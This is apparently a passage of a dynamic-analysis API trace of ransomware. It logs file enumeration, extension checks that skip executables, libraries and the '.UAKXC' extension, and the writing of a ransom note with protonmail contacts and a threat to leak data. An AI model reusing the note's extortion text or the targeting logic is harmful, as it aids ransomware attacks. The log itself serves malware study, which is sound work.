ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0151.092] lstrcmpW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0151.092] lstrcmpW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".UAKXC") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".exe") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".dll") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".lnk") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".sys") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".msi") returned=".msi" [0151.092] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0151.092] lstrcmpW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0151.092] lstrcmpW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0151.092] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".UAKXC") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".exe") returned 0x0 [0151.092] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".dll") returned 0x0 [0151.093] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".lnk") returned 0x0 [0151.093] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".sys") returned 0x0 [0151.093] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".msi") returned 0x0 [0151.093] StrStrIW (lpFirst="Office32WW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.093] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.093] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.093] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0151.093] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0151.093] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.093] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.093] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0151.093] lstrcmpW (lpString1="ose.exe", lpString2=".") returned 1 [0151.093] lstrcmpW (lpString1="ose.exe", lpString2="..") returned 1 [0151.093] StrStrIW (lpFirst="ose.exe", lpSrch=".UAKXC") returned 0x0 [0151.093] StrStrIW (lpFirst="ose.exe", lpSrch=".exe") returned=".exe" [0151.093] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0151.093] lstrcmpW (lpString1="osetup.dll", lpString2=".") returned 1 [0151.093] lstrcmpW (lpString1="osetup.dll", lpString2="..") returned 1 [0151.093] StrStrIW (lpFirst="osetup.dll", lpSrch=".UAKXC") returned 0x0 [0151.093] StrStrIW (lpFirst="osetup.dll", lpSrch=".exe") returned 0x0 [0151.093] StrStrIW (lpFirst="osetup.dll", lpSrch=".dll") returned=".dll" [0151.093] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0151.093] lstrcmpW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0151.094] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".UAKXC") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".exe") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".dll") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".lnk") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".sys") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".msi") returned 0x0 [0151.094] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf68 | out: hHeap=0xea0000) returned 1 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0151.094] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a1218 [0151.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.094] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.094] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0151.094] lstrcmpW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0151.094] lstrcmpW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0151.094] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".UAKXC") returned 0x0 [0151.094] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".exe") returned 0x0 [0151.094] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".dll") returned=".dll" [0151.094] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0151.094] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0151.094] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".UAKXC") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".exe") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".dll") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".lnk") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".sys") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".msi") returned 0x0 [0151.095] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch="R3ADM3.txt") returned 0x0 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.095] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.095] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.095] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0x7770008 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfe0 [0151.095] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xee3ce0 [0151.095] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7770008 | out: hHeap=0xea0000) returned 1 [0151.095] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.095] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ef85e50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5ef85e50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f044530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0151.095] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0151.095] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0151.095] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0151.095] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0151.096] lstrcmpW (lpString1="setup.exe", lpString2=".") returned 1 [0151.096] lstrcmpW (lpString1="setup.exe", lpString2="..") returned 1 [0151.096] StrStrIW (lpFirst="setup.exe", lpSrch=".UAKXC") returned 0x0 [0151.096] StrStrIW (lpFirst="setup.exe", lpSrch=".exe") returned=".exe" [0151.096] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0151.096] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0151.096] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0151.096] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.096] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.096] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.096] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac40 | out: hHeap=0xea0000) returned 1 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0151.096] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a12c0 [0151.096] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.096] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.096] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0151.096] lstrcmpW (lpString1="VisiorWW.cab", lpString2=".") returned 1 [0151.096] lstrcmpW (lpString1="VisiorWW.cab", lpString2="..") returned 1 [0151.096] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".UAKXC") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".exe") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".dll") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".lnk") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".sys") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".msi") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c38 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.097] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.097] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.097] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c38 | out: hHeap=0xea0000) returned 1 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c38 [0151.097] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a1368 [0151.097] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.097] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.097] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0151.097] lstrcmpW (lpString1="VisiorWW.msi", lpString2=".") returned 1 [0151.097] lstrcmpW (lpString1="VisiorWW.msi", lpString2="..") returned 1 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".UAKXC") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".exe") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".dll") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".lnk") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".sys") returned 0x0 [0151.097] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".msi") returned=".msi" [0151.097] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0151.097] lstrcmpW (lpString1="VisiorWW.xml", lpString2=".") returned 1 [0151.098] lstrcmpW (lpString1="VisiorWW.xml", lpString2="..") returned 1 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".UAKXC") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".exe") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".dll") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".lnk") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".sys") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".msi") returned 0x0 [0151.098] StrStrIW (lpFirst="VisiorWW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee8508 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee8508 | out: hHeap=0xea0000) returned 1 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee8508 [0151.098] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a1410 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.098] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd5d0 | out: hHeap=0xea0000) returned 1 [0151.098] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecba8 | out: hHeap=0xea0000) returned 1 [0151.098] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0151.099] Sleep (dwMilliseconds=0x32) [0151.150] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.150] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0151.150] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecba8 [0151.150] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec35a8 [0151.151] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3600 [0151.151] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0151.151] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3600 | out: hHeap=0xea0000) returned 1 [0151.151] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec35a8 | out: hHeap=0xea0000) returned 1 [0151.151] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecba8 | out: hHeap=0xea0000) returned 1 [0151.151] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\designer\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0151.152] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0151.152] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0151.153] CloseHandle (hObject=0x6dc) returned 1 [0151.153] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0151.153] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0151.153] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, 